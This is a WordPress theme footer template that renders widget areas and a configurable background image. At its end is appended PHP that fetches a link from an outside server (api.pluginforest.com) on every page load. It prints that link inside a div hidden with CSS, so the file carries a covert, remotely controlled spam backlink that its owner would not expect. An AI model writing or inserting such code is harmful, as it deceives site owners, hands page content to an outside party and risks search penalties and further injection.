  <?php $anondho_redux_demo = get_option('redux_demo'); ?>
</main>

<!-- footer-area-start -->
<footer>
    <?php if(isset($anondho_redux_demo['footer_image']) && $anondho_redux_demo['footer_image'] != ''){?>
    <div class="footer-area pt-120 pb-50" style="background-image:url(<?php echo esc_url($anondho_redux_demo['footer_image']['url']);?>)">
    <?php }else{?>
    <div class="footer-area pt-120 pb-50" style="background-image:url(<?php echo (get_template_directory_uri().'/assets/img/bg/bg-6.jpg');?>)">
    <?php } ?>
        <div class="container">
            <div class="row">
                <div class="col-xl-4 col-lg-4 col-md-6">
                     <?php if ( is_active_sidebar( 'footer-area-1' ) ) : ?>
                            <?php dynamic_sidebar( 'footer-area-1' ); ?>
                        <?php endif; ?>
                </div>
                <div class="col-xl-4 col-lg-4 col-md-6">
                     <?php if ( is_active_sidebar( 'footer-area-2' ) ) : ?>
                            <?php dynamic_sidebar( 'footer-area-2' ); ?>
                        <?php endif; ?>
                </div>
                <div class="col-xl-4 col-lg-4 col-md-6">
                     <?php if ( is_active_sidebar( 'footer-area-3' ) ) : ?>
                            <?php dynamic_sidebar( 'footer-area-3' ); ?>
                        <?php endif; ?>
                </div>
            </div>
        </div>
    </div>
</footer>

  <?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>